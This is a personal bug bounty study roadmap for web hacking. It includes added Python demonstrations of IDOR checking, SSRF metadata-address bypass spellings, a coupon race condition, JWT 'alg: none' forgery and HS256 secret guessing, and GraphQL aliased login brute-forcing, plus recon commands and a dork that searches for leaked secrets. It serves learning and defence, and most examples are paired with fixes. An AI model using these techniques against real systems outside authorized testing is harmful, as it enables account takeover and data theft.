Bug Bounty $100,000 Roadmap — 12-Month Plan

I had Claude help me make a 12-month plan and I am going to do it. 2026 is already 25% over. I do not want to waste any more time. I also used some info from this post by Justin Gardner (@Rhynorater).

I will spend as much time on Bug Bounty as I possibly can starting this Thursday, 26th March 2026.

Profile: BS Cybersecurity | A+, Net+, Sec+, Pentest+, CySA+, ISC2 SSCP

Commitment: 40+ hours/week

Track: Web Application Hacking


Math

To hit $100k, you need roughly one of these scenarios:

  • 10–15 high-severity bugs at $5k–$10k each
  • 3–5 critical bugs at $15k–$30k each + a handful of mediums
  • 50–80 medium bugs at $1k–$2k each

The plan below optimizes for the middle path: specialize fast, get your first bounties within 90 days, then compound skills to chase criticals.


Overview

Phase   Months   Focus                                   Earning target
1       1–2      Foundation & tooling                    $0 (building skills)
2       3–4      Core vuln classes + first bounties      $500–$2,000
3       5–7      Advanced techniques & chaining          $5k–$15k total
4       8–12     Full hunter mode                        $85k–$100k+ total

Phase 1 — Months 1–2: Foundation (~350 hrs total)

JavaScript — 40 hours

Resource: javascript.info (free) — complete Parts 1 and 2

Focus on:

  • DOM manipulation
  • document.location, innerHTML, eval()
  • Event listeners and fetch()
  • How cookies work in JS
  • postMessage and cross-origin communication

Practice: Open any website, open DevTools, read their JS files. Try to understand what data flows where.

DOM XSS, client-side logic flaws, and postMessage vulnerabilities are all high-payout and invisible if you can’t read JS.
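A reading aid for the "spot sources and sinks" goal, added here as an example that is not part of the original plan. It is plain regex matching over script text, not taint analysis, so it only tells you where to look; the sample script and its two bugs are constructed, not taken from any real site.

```python
"""Rough DOM XSS source/sink finder for a JavaScript file.

Added example, not code from the original plan. It is plain regex matching
over script text: a reading aid for triage, not taint analysis, so every
hit still has to be traced by hand in DevTools.
"""
import re

# Attacker-controlled inputs (sources) and dangerous outputs (sinks).
SOURCES = {
    "location.hash": r"location\.hash",
    "location.search": r"location\.search",
    "location.href": r"location\.href",
    "document.URL": r"document\.URL\b",
    "document.referrer": r"document\.referrer",
    "window.name": r"window\.name\b",
    "postMessage handler": r"addEventListener\(\s*['\"]message['\"]",
    "event.data": r"\b(event|e|msg)\.data\b",
}
SINKS = {
    "innerHTML": r"\.innerHTML\s*=(?!=)",
    "outerHTML": r"\.outerHTML\s*=(?!=)",
    "insertAdjacentHTML": r"\.insertAdjacentHTML\(",
    "document.write": r"document\.write(ln)?\(",
    "eval": r"\beval\(",
    "Function()": r"\bFunction\(",
    "setTimeout(string)": r"set(Timeout|Interval)\(\s*['\"]",
    "location assignment": r"location(\.href)?\s*=(?!=)|location\.(assign|replace)\(",
    "jQuery html()": r"\.html\(",
}

def scan_js(source):
    """Return source/sink hits by line, plus lines where both appear together."""
    found = {"sources": [], "sinks": [], "same_line": []}
    for lineno, line in enumerate(source.splitlines(), 1):
        srcs = [name for name, pat in SOURCES.items() if re.search(pat, line)]
        snks = [name for name, pat in SINKS.items() if re.search(pat, line)]
        found["sources"] += [(lineno, n) for n in srcs]
        found["sinks"] += [(lineno, n) for n in snks]
        if srcs and snks:
            found["same_line"].append((lineno, srcs, snks))
    return found

# Constructed sample script (not any real site's code) with two classic bugs.
SAMPLE_JS = """
var q = decodeURIComponent(location.hash.slice(1));
document.getElementById('out').innerHTML = q;
window.addEventListener('message', function (e) {
  eval(e.data);   // no origin check on the postMessage handler
});
setTimeout(function () { console.log('safe'); }, 10);
"""

if __name__ == "__main__":
    report = scan_js(SAMPLE_JS)
    for kind in ("sources", "sinks"):
        for lineno, name in report[kind]:
            print(f"{kind[:-1]:6} line {lineno}: {name}")
    for lineno, srcs, snks in report["same_line"]:
        print(f"CHECK  line {lineno}: {srcs} flows into {snks}?")
```

The `same_line` list is the cheap win (line 5: `e.data` straight into `eval`); the `location.hash` on line 2 reaching `innerHTML` on line 3 is the case the script cannot see, and is exactly the flow you trace by hand in the DevTools debugger.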


Burp Suite Mastery — 30 hours

Resource: PortSwigger Web Security Academy (free) — Burp Suite-specific sections

Learn:

  • Intruder, Repeater, Comparer, Decoder, Logger
  • Match-and-replace rules
  • Writing Burp extensions: the Montoya API is for Java (Kotlin works too); Python extensions use the older Extender API via Jython
  • Setting up FoxyProxy
  • Intercepting mobile apps with Burp

HTTP & Web Fundamentals — 20 hours

Learn:

  • Every HTTP status code and what it means in a bug context
  • CORS, SameSite cookies, CSP headers
  • How OAuth 2.0 flows work at the protocol level

Practice: Use curl for everything — it forces you to understand what Burp is doing under the hood.


PortSwigger Academy Labs — Ongoing

Start these in week 1, run in parallel with everything else. Goal: 50 labs completed by end of month 2.

Priority order:

  1. SQL injection
  2. XSS (all three types)
  3. CSRF
  4. Access control
  5. Authentication

Phase 1 Goals (by day 60)

  • Solve 50 PortSwigger labs
  • Read JS well enough to spot sources and sinks
  • Write a basic XSS payload from scratch without looking it up
  • Understand every HTTP verb and common header
  • Set up a full local Burp proxy environment

Phase 2 — Months 3–4: Core Vulnerability Classes (~350 hrs)

Now you start hunting for real, alongside learning.

IDOR & Broken Access Control — 25 hours

This is the #1 source of first bounties for new hunters. Scanners miss them because finding one means understanding who is supposed to see what in the application, not just pattern-matching requests.

What to do:

  • Every time you see a numeric ID in a URL or request body, try changing it
  • Look for UUIDs too: they are hard to guess, but they are often leaked in other responses (search results, exports, other users' profiles), after which a UUID-keyed endpoint is just an IDOR with a longer ID
  • Test horizontal and vertical privilege escalation separately

Resources:

  • The “IDOR Bible” write-up by @r0x
  • Every HackerOne disclosed IDOR report (filter by “Broken Access Control” on HackerOne Hacktivity)
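The differential check behind "change the ID, replay with another session" is what Autorize automates; here it is spelled out as an added example that is not part of the original plan. `send` stands in for whatever issues the request (a requests.Session through Burp, curl); to keep the script offline it is a constructed in-memory API, and the users, sessions and invoice records are made up.

```python
"""Differential access-control check: the logic Autorize automates.

Added example, not code from the original plan. `send` stands in for
whatever issues the request (a requests.Session through Burp, curl, ...);
here it is a constructed in-memory API so the script runs offline. The
users, sessions and invoice records are made up.
"""
import json

USERS = {"sess_alice": "alice", "sess_bob": "bob"}          # session -> user
INVOICES = {
    "1001": {"owner": "alice", "total": 120.0, "iban": "DE00 1111"},
    "1002": {"owner": "bob", "total": 80.0, "iban": "DE00 2222"},
}

def fake_api(path, session, enforce_owner):
    """Stand-in server for GET /api/invoices/<id>; returns (status, body)."""
    user = USERS.get(session)
    if user is None:
        return 401, json.dumps({"error": "unauthenticated"})
    parts = path.strip("/").split("/")
    if len(parts) != 3 or parts[:2] != ["api", "invoices"]:
        return 404, json.dumps({"error": "not found"})
    inv = INVOICES.get(parts[2])
    if inv is None:
        return 404, json.dumps({"error": "not found"})
    if enforce_owner and inv["owner"] != user:     # the missing check in the vulnerable build
        return 403, json.dumps({"error": "forbidden"})
    return 200, json.dumps(inv)

def idor_check(send, path, victim_session, attacker_session, anon_session="sess_none"):
    """Replay the victim's request as another user and as nobody.

    Verdicts: 'bypassed' when the other session gets the victim's exact 200
    response, 'enforced' when the server refuses, 'differs' when it answers
    but with different content (needs a manual look: partial data, or a
    different object of the same shape).
    """
    base_status, base_body = send(path, victim_session)
    if base_status != 200:
        return {"baseline_status": base_status, "note": "fix the baseline request first"}

    def verdict(status, body):
        if status in (401, 403):
            return "enforced"
        if status == 200 and body == base_body:
            return "bypassed"
        return "differs"

    return {
        "baseline_status": base_status,
        "horizontal": verdict(*send(path, attacker_session)),    # same role, other user
        "unauthenticated": verdict(*send(path, anon_session)),   # no session at all
    }

def run(enforce_owner):
    send = lambda path, sess: fake_api(path, sess, enforce_owner)
    return idor_check(send, "/api/invoices/1001", "sess_alice", "sess_bob")

if __name__ == "__main__":
    print("vulnerable build:", run(enforce_owner=False))
    print("fixed build:     ", run(enforce_owner=True))
```

For the vertical case, call `idor_check` with an admin session as the victim and a normal user's session as the attacker against an admin-only path. Capture both sessions fresh before a run: an expired session produces a 401 that looks like "enforced" and hides a real bypass.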

XSS Deep Dive — 25 hours

Go beyond <script>alert(1)</script>.

Learn:

  • Stored XSS in rich text editors, file uploads, profile fields
  • DOM XSS via location.hash, document.referrer, window.name
  • Filter bypass techniques — encoding, polyglots, SVG payloads, mutation XSS (mXSS)
  • How to use XSS Hunter to prove impact to triagers (this affects payout)

Resource: PortSwigger XSS labs — complete all of them including expert-level


SQLi, SSRF, XXE — 25 hours

SQL Injection:

  • Focus on blind and time-based — these are still found in the wild constantly
  • Learn sqlmap but understand what it’s doing under the hood

SSRF (Server-Side Request Forgery):

  • This is a high-payout vulnerability. Learn the cloud metadata endpoints: 169.254.169.254 on AWS, GCP and Azure. Caveats: AWS IMDSv2 needs a PUT to fetch a token first, so a GET-only SSRF may not reach it; GCP requires the Metadata-Flavor: Google header; Azure requires the Metadata: true header
  • How to pivot SSRF to internal services
  • Blind SSRF via out-of-band (use Burp Collaborator or interactsh)
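The metadata address has more than one spelling, and a string blocklist catches only the first. As an added example (not part of the original plan), here is the naive filter beside the check a server actually needs; the four attacker URLs are constructed, and hostnames are deliberately out of scope (they must be resolved and the resolved address re-checked and pinned, otherwise DNS rebinding defeats the filter).

```python
"""SSRF target filtering: a string blocklist beside a normalising check.

Added example, not code from the original plan. It shows why the literal
"169.254.169.254" is only one spelling of the metadata address worth
trying, and what a server-side check has to do instead. Only IP-literal
hosts are handled; a hostname must be resolved and the resolved address
re-checked (and pinned, against DNS rebinding), which is left out here.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed attacker inputs that all reach the metadata service.
SPELLINGS = [
    "http://169.254.169.254/latest/meta-data/",          # the obvious one
    "http://2852039166/latest/meta-data/",               # decimal IPv4
    "http://0xa9fea9fe/latest/meta-data/",               # hex IPv4
    "http://[::ffff:a9fe:a9fe]/latest/meta-data/",       # IPv4-mapped IPv6
]

def blocklist_allows(url):
    """Vulnerable filter: refuses only the literal strings it knows."""
    return "169.254.169.254" not in url and "localhost" not in url

def host_to_ip(host):
    """Normalise the spellings of an IP literal to an ip_address, or None for a hostname."""
    h = host.strip("[]")                       # IPv6 literals arrive bracketed
    if h.isdigit():                            # decimal form
        return ipaddress.ip_address(int(h))
    if h[:2].lower() == "0x" and len(h) > 2 and all(c in "0123456789abcdefABCDEF" for c in h[2:]):
        return ipaddress.ip_address(int(h[2:], 16))   # hex form
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return None                            # a hostname, not a literal
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                    # ::ffff:a.b.c.d is really a.b.c.d
    return ip

def normalised_allows(url):
    """Hardened filter: parse, normalise, then allow only globally routable addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ip = host_to_ip(parts.hostname)
    if ip is None:
        return False        # hostname: resolve and re-check here (not shown)
    return ip.is_global     # False for loopback, RFC1918, link-local (169.254/16) and friends

def passes(filter_fn):
    """Which of the constructed spellings a filter lets through."""
    return [u for u in SPELLINGS if filter_fn(u)]

if __name__ == "__main__":
    print("blocklist lets through :", passes(blocklist_allows))
    print("normalised lets through:", passes(normalised_allows))
```

Read it from both sides: the `SPELLINGS` list is the hunter's checklist when the obvious address is blocked, and `normalised_allows` is the shape of the fix worth suggesting in the report's remediation section.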

XXE:

  • File disclosure via external entity
  • Blind XXE via OOB

Resource: PortSwigger labs for all three categories


Auth & Session Attacks — 15 hours

Learn:

  • Password reset flow flaws (host header injection, token predictability, race conditions)
  • Session fixation and session puzzling
  • 2FA bypass techniques (code reuse, response manipulation, backup code flaws)

Resource: PortSwigger Authentication labs


Start Hunting in Month 3

Sign up for HackerOne and Bugcrowd. Start with programs that have “safe harbor” language and wide scope.

Good starting programs:

  • HackerOne’s own bug bounty program
  • U.S. Department of Defense VDP (no bounties, but great for learning and lower competition)
  • Large tech companies with broad scopes and fast triage

Your goal in month 3 is not money — it is getting your first report triaged, even if it comes back as N/A. The feedback is invaluable.


Phase 2 Goals (by day 120)

  • Submit first bug report (even if N/A)
  • Win first bounty (aim: $100–$500)
  • Complete HackTheBox or TryHackMe web labs
  • Build a personal recon methodology document
  • Read 20 disclosed reports on HackerOne Hacktivity
  • Set up a notes system (Obsidian or Notion) for your findings

Phase 3 — Months 5–7: Advanced Techniques & Chaining (~420 hrs)

Business Logic Flaws — 30 hours

These cannot be found by scanners. They require understanding what the app is supposed to do and figuring out how to make it do something it should not.

Examples:

  • Price manipulation and coupon stacking
  • Quantity overflows and negative values
  • Workflow bypasses (skipping steps in a multi-step process)
  • Race conditions — two simultaneous requests that each independently pass a check

Resources:

  • PortSwigger Business Logic labs
  • Every disclosed “logic” bug on HackerOne Hacktivity
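The race condition bullet above in working form, as an added example that is not part of the original plan: a single-use coupon whose check and decrement are two separate steps, beside the fixed version. `CouponService` is a constructed in-memory stand-in for the real endpoint; a `threading.Barrier` forces the interleaving that, against a live target, you provoke with Turbo Intruder's single-packet attack or a burst of parallel requests.

```python
"""Check-then-act race on a single-use coupon, and the fix.

Added example, not code from the original plan. CouponService is a
constructed in-memory stand-in for the real endpoint. A threading.Barrier
forces the interleaving that, against a live target, you provoke with
Turbo Intruder's single-packet attack or a burst of parallel requests.
"""
import threading

class CouponService:
    def __init__(self, code, uses):
        self.uses_left = {code: uses}
        self.redemptions = []              # (user, code) actually granted
        self._lock = threading.Lock()

    def redeem_vulnerable(self, user, code, gate=None):
        # Step 1: check. Every concurrent request sees uses_left == 1 here.
        if self.uses_left.get(code, 0) <= 0:
            return False
        if gate is not None:
            gate.wait(timeout=5)           # hold everyone until all have passed the check
        # Step 2: act. The check is stale for all but the first request.
        self.uses_left[code] -= 1
        self.redemptions.append((user, code))
        return True

    def redeem_fixed(self, user, code, gate=None):
        if gate is not None:
            gate.wait(timeout=5)           # same burst of simultaneous arrivals
        with self._lock:                   # check and act are now one atomic step
            if self.uses_left.get(code, 0) <= 0:
                return False
            self.uses_left[code] -= 1
            self.redemptions.append((user, code))
            return True

def hammer(redeem, n, code="SAVE50"):
    """Fire n concurrent redemptions; return how many were granted."""
    gate = threading.Barrier(n)
    results = [None] * n

    def worker(i):
        results[i] = redeem(f"user{i}", code, gate)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(1 for r in results if r)

def demo(n=10):
    """(granted by vulnerable code, granted by fixed code) for one single-use coupon."""
    vuln = CouponService("SAVE50", uses=1)
    fixed = CouponService("SAVE50", uses=1)
    return hammer(vuln.redeem_vulnerable, n), hammer(fixed.redeem_fixed, n)

if __name__ == "__main__":
    granted_vuln, granted_fixed = demo()
    print(f"single-use coupon redeemed {granted_vuln} times (vulnerable), {granted_fixed} times (fixed)")
```

In a real backend the "lock" is a database transaction or an atomic conditional update (`UPDATE ... SET uses_left = uses_left - 1 WHERE code = ? AND uses_left > 0`, then checking the affected row count), not a process-local mutex; a per-process lock does nothing once the app runs on several instances, which is worth saying in the remediation section of the report.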

OAuth / JWT / SSO Attacks — 25 hours

These are disproportionately high payout because:

  • They affect authentication, so a working exploit is usually full account takeover, which programs rate critical
  • They are complex enough that most junior hunters cannot find them
  • Account takeover via OAuth is often a P1 ($10k+)

Learn:

  • Missing or unvalidated state parameter (CSRF on the callback: login CSRF and account-linking attacks)
  • Open redirect chaining to steal authorization codes (loose redirect_uri validation)
  • Token leakage via the Referer header
  • JWT alg:none attack
  • JWT secret brute-forcing with hashcat (mode 16500)
  • Implicit flow vulnerabilities (access token in the URL fragment, exposed to history, logs and third-party scripts)

Resources:

  • PortSwigger OAuth labs (all of them)
  • “An Illustrated Guide to OAuth and OpenID Connect” (okta.com)
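The two JWT bullets above, worked through as an added example that is not part of the original plan: forging an `alg: none` token, guessing a weak HS256 secret offline, and the verifier that refuses both. It uses only the standard library, so it runs without PyJWT; the secret, the claims and the wordlist are constructed.

```python
"""JWT 'alg: none' forgery, an HS256 weak-secret search, and a verifier
that refuses both.

Added example, not code from the original plan; standard library only, so
it runs without PyJWT. The signing secret, claims and wordlist are
constructed.
"""
import base64
import hashlib
import hmac
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _encode(obj):
    return b64url(json.dumps(obj, separators=(",", ":")).encode())

def sign_hs256(payload, secret):
    """What the server does: HMAC-SHA256 over header.payload."""
    h, p = _encode({"alg": "HS256", "typ": "JWT"}), _encode(payload)
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url(sig)}"

def forge_alg_none(token, new_claims):
    """Attacker: rewrite claims, set alg=none, send an empty signature."""
    _, p, _ = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    return f"{_encode({'alg': 'none', 'typ': 'JWT'})}.{_encode(payload)}."

def crack_hs256(token, wordlist):
    """Attacker: offline secret guessing (what hashcat -m 16500 does at scale)."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for guess in wordlist:
        cand = hmac.new(guess.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(cand, target):
            return guess
    return None

def verify_naive(token, secret):
    """Vulnerable: lets the token's header pick the algorithm, so 'none' means 'unsigned is fine'."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg", "").lower() == "none":
        return json.loads(b64url_decode(p))
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if hmac.compare_digest(expected, b64url_decode(s)) else None

def verify_strict(token, secret):
    """Hardened: the server pins the algorithm; anything else is rejected before any crypto."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        sig = b64url_decode(s)
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256" or not sig:
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if hmac.compare_digest(expected, sig) else None

SECRET = b"secret123"                                        # constructed weak server secret
TOKEN = sign_hs256({"sub": "1337", "role": "user"}, SECRET)  # a normal user's token
FORGED = forge_alg_none(TOKEN, {"role": "admin"})

if __name__ == "__main__":
    print("naive  accepts forged token as:", verify_naive(FORGED, SECRET))
    print("strict accepts forged token as:", verify_strict(FORGED, SECRET))
    print("recovered secret:", crack_hs256(TOKEN, ["password", "changeme", "secret123"]))
```

Note that the hardened verifier allowlists the one algorithm the server issues instead of blocklisting spellings of "none"; that also closes the HS256/RS256 confusion variant, where a token signed with the server's public key as an HMAC secret is accepted by a verifier that lets the header choose.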

API Hacking — 25 hours

Every app has an API. Many are poorly documented and undertested.

Learn:

  • Mass assignment vulnerabilities (sending extra JSON fields the API accepts)
  • Excessive data exposure (API returns more data than the UI shows)
  • Broken Object Level Authorization (BOLA — essentially API-level IDOR)
  • Using Postman and REST Client to interact with APIs manually

Resources:

  • OWASP API Security Top 10
  • APIsec University (free)

GraphQL & WebSockets — 15 hours

GraphQL:

  • Introspection queries to map the entire API surface
  • Aliased/batched queries to bypass per-request rate limiting (login, OTP, coupon endpoints)
  • Injection through resolver arguments (the same SQLi/NoSQLi, just reached through GraphQL)

WebSockets:

  • Message tampering via Burp
  • Cross-site WebSocket hijacking

Resource: PortSwigger GraphQL labs
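The first two GraphQL bullets as an added example (not part of the original plan): turning an introspection result into a list of callable root fields, and building one aliased document that invokes the same mutation many times. `SAMPLE_RESPONSE` is a constructed, heavily trimmed `__schema` answer with invented field names; a real one is far larger and includes every type.

```python
"""GraphQL: read an introspection result into an attack-surface list, and
build an aliased batch for a rate-limited mutation.

Added example, not code from the original plan. SAMPLE_RESPONSE is a
constructed, heavily trimmed __schema answer (a real one is far larger and
includes every type); the field names in it are invented.
"""
import json

# The query to send; most servers answer it unless introspection is disabled.
INTROSPECTION_QUERY = """
query {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name kind
      fields {
        name
        args { name type { kind name ofType { kind name ofType { kind name } } } }
        type { kind name ofType { kind name ofType { kind name } } }
      }
    }
  }
}
"""

def _t(kind, name=None, of=None):
    return {"kind": kind, "name": name, "ofType": of}

SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "me", "args": [], "type": _t("OBJECT", "User")},
            {"name": "user", "args": [{"name": "id", "type": _t("NON_NULL", of=_t("SCALAR", "ID"))}],
             "type": _t("OBJECT", "User")},
        ]},
        {"name": "Mutation", "kind": "OBJECT", "fields": [
            {"name": "login", "args": [
                {"name": "username", "type": _t("NON_NULL", of=_t("SCALAR", "String"))},
                {"name": "password", "type": _t("NON_NULL", of=_t("SCALAR", "String"))}],
             "type": _t("OBJECT", "AuthPayload")},
            {"name": "adminDeleteUser", "args": [{"name": "id", "type": _t("NON_NULL", of=_t("SCALAR", "ID"))}],
             "type": _t("SCALAR", "Boolean")},
        ]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "id", "args": [], "type": _t("NON_NULL", of=_t("SCALAR", "ID"))},
            {"name": "email", "args": [], "type": _t("SCALAR", "String")},
            {"name": "invoices", "args": [], "type": _t("LIST", of=_t("OBJECT", "Invoice"))},
        ]},
    ],
}}}

def type_name(t):
    """Collapse NON_NULL/LIST wrappers into SDL notation, e.g. [Invoice] or ID!."""
    if t is None:
        return "?"
    if t["kind"] == "NON_NULL":
        return type_name(t.get("ofType")) + "!"
    if t["kind"] == "LIST":
        return "[" + type_name(t.get("ofType")) + "]"
    return t.get("name") or "?"

def map_surface(response):
    """{'Query': [signatures], 'Mutation': [signatures]}: the root fields you can call."""
    schema = response["data"]["__schema"]
    by_name = {t["name"]: t for t in schema["types"]}
    surface = {}
    for root in (schema.get("queryType"), schema.get("mutationType")):
        if not root:
            continue
        sigs = []
        for f in by_name[root["name"]].get("fields") or []:
            args = ", ".join(f"{a['name']}: {type_name(a['type'])}" for a in f.get("args") or [])
            ret = type_name(f["type"])
            sigs.append(f"{f['name']}({args}): {ret}" if args else f"{f['name']}: {ret}")
        surface[root["name"]] = sigs
    return surface

def aliased_batch(field, fixed_args, vary_arg, candidates, selection):
    """One request, many calls: aliases let a single document invoke the same mutation N times."""
    lines = []
    for i, value in enumerate(candidates):
        args = dict(fixed_args, **{vary_arg: value})
        arg_s = ", ".join(f"{k}: {json.dumps(v)}" for k, v in args.items())
        lines.append(f"  a{i}: {field}({arg_s}) {{ {selection} }}")
    return "mutation {\n" + "\n".join(lines) + "\n}"

if __name__ == "__main__":
    for root, sigs in map_surface(SAMPLE_RESPONSE).items():
        print(root)
        for s in sigs:
            print("  ", s)
    print(aliased_batch("login", {"username": "victim"}, "password", ["Winter2025!", "Password1"], "token"))
```

Root fields whose names start with `admin` are the first thing to try with a low-privilege session; and if the batched login returns a `token` under one alias while the HTTP-level rate limiter only counted one request, that is the rate-limit bypass the bullet refers to.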


Bug Chaining — 20 hours

This is the skill that 10x’s your payouts. A medium-severity XSS combined with an information disclosure that leaks an admin token equals a critical account takeover.

Practice:

  • Every time you find a low-severity bug, ask: “what can I do with this?”
  • Study how top hunters chain bugs in their public write-ups

Resource: https://pentester.land/list-of-bug-bounty-writeups — filter for “chain” write-ups


Build Your Recon Automation Pipeline

Set this up and let it run in the background while you manually test.

# Basic recon pipeline (target.com stands in for an in-scope domain;
# nuclei uses its default template set when -t is not given)
subfinder -d target.com -silent | httpx -silent | nuclei -silent -o nuclei.txt

# Passive URL collection: gau and waybackurls both read domains on stdin,
# so feed each the domain (not the other tool's output) and de-duplicate once
echo target.com | gau --subs > urls.raw
echo target.com | waybackurls >> urls.raw
sort -u urls.raw > urls.txt
grep '?' urls.txt > params.txt      # URLs with query strings: fuzzing candidates

# GitHub dorking
# Search: org:targetorg password OR secret OR api_key

Tools to install:

  • subfinder — subdomain enumeration
  • amass — in-depth DNS enumeration
  • httpx — HTTP probing
  • nuclei — template-based scanning
  • ffuf — fast web fuzzer
  • gau — get all URLs
  • waybackurls — Wayback Machine URL fetcher
  • notify — send alerts to Telegram or Discord

Phase 3 Goals (by day 210)

  • $5k–$15k earned total
  • 1–2 programs you know deeply (understand their tech stack and past findings)
  • Land first high-severity (P2) report
  • Automated recon pipeline running
  • Writing reports that get triaged without back-and-forth
  • Receive first private program invite

Phase 4 — Months 8–12: Full Hunter Mode

By now you have a niche, a methodology, and recurring income. The job now is volume combined with depth.

Weekly Time Split

  • 30 hours/week actively hunting on programs
  • 10 hours/week learning new techniques and reading write-ups

Pick One Niche to Go Expert-Level

The hunters who make $100k+ are known for something. Choose based on where you have found the most success:

Niche                   Why                                       Payout potential
OAuth / SSO             Highest payouts, least competition        P1 frequently ($10k–$30k)
Mobile API backends     Poor security, undertested                P1–P2 range
GraphQL                 Newer tech, overlooked everywhere         P2–P1 range
Cloud misconfigs        AWS/GCP misconfigs, metadata leaks        Varies widely

Private Programs

  • HackerOne and Bugcrowd invite top hunters to private programs
  • Private programs have less competition, higher payouts, and broader scope
  • You get invites by: finding bugs, building reputation, and sometimes by directly asking program managers
  • Target: First private invite by month 6–7

Report Quality

A well-written report gets triaged faster, bounty paid sooner, and triagers remember you for future reports.

Every report must include:

  1. Vulnerability summary — one clear sentence describing the issue
  2. Steps to reproduce — numbered, explicit, anyone should be able to follow them
  3. Proof of concept — working exploit code, screenshots, or video walkthrough
  4. Impact statement — what can an attacker actually do with this? Be specific
  5. Suggested remediation — shows professionalism, speeds up triage

Phase 4 Goals (by month 12)

  • $85k–$100k+ earned total
  • Strong reputation score on HackerOne or Bugcrowd
  • 3+ active private program invites
  • At least one critical / P1 bug in your portfolio
  • Recognized niche specialization
  • Public write-up or conference talk (optional but accelerates invites)

Weekly Schedule

Time block                        Activity
Mon–Fri mornings (4 hrs/day)      Active hunting on chosen programs
Mon/Wed evenings (2 hrs each)     PortSwigger labs or new technique study
Tue/Thu evenings (2 hrs each)     Read 5 disclosed reports per session
Saturday (6–8 hrs)                Deep dive on one new vulnerability class
Sunday (3–4 hrs)                  Write-up review, recon automation, program research

Platforms

Platform          Notes
HackerOne         Start here. Most beginner-friendly, most disclosed reports to learn from
Bugcrowd          Good second platform once you have momentum
Intigriti         European programs, less saturated
YesWeHack         Less competitive than HackerOne
DoD VDP           Very broad scope but no bounties (it is a VDP); great for learning
Synack / Cobalt   Avoid early on: curated, hard to get into as a new hunter

Learning Resources

Free

  • PortSwigger Web Security Academy — the single best resource on the internet for web hacking
  • The Bug Hunter’s Methodology — Jason Haddix on YouTube, must-watch
  • Nahamsec on YouTube/Twitch — one of the best hunters actively teaching
  • PentesterLand write-ups list: https://pentester.land/list-of-bug-bounty-writeups
  • HackerOne Hacktivity — disclosed reports, sorted by bounty amount

Tools Reference

Essential Setup

# Install Go (required for most tools; pacman is Arch-specific, use your distro's package manager)
sudo pacman -S go

# go install puts binaries in $(go env GOPATH)/bin, which has to be on PATH
export PATH="$PATH:$(go env GOPATH)/bin"

# Recon tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/owasp-amass/amass/v4/...@master

# Update nuclei templates
nuclei -update-templates

Burp Suite Extensions to Install

  • Autorize — automatic access control testing
  • Turbo Intruder — fast fuzzing beyond what Intruder can do
  • Logger++ — advanced request logging
  • JS Miner — extracts endpoints and secrets from JS files
  • Param Miner — discovers hidden parameters

Key Mindset Points

The first 60 days are the hardest.

Read more write-ups than you think you need to. The fastest way to learn to find bugs is to understand exactly how other people found them. Aim for 5 write-ups per day in months 1–4.

Go deep on programs, not wide.

Impact is everything. A bug is only worth what an attacker can do with it. Always ask: “can I chain this into something worse?” A self-XSS is N/A. A self-XSS that becomes account takeover via a CSRF is a P2.

Your reports are your reputation.


Last updated: March 2026